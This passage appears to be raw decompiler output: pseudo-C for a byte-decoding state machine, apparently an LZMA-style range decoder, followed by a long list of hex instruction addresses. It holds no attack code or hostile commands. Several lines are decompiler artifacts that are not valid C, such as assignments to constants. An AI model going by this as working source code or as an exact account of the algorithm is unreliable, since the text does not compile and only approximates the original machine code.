												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00407068
0x00407068
0x0040706c
0x00407095
0x0040709f
0x0040706e
0x00407077
0x00407084
0x00407087
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x004073cb
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
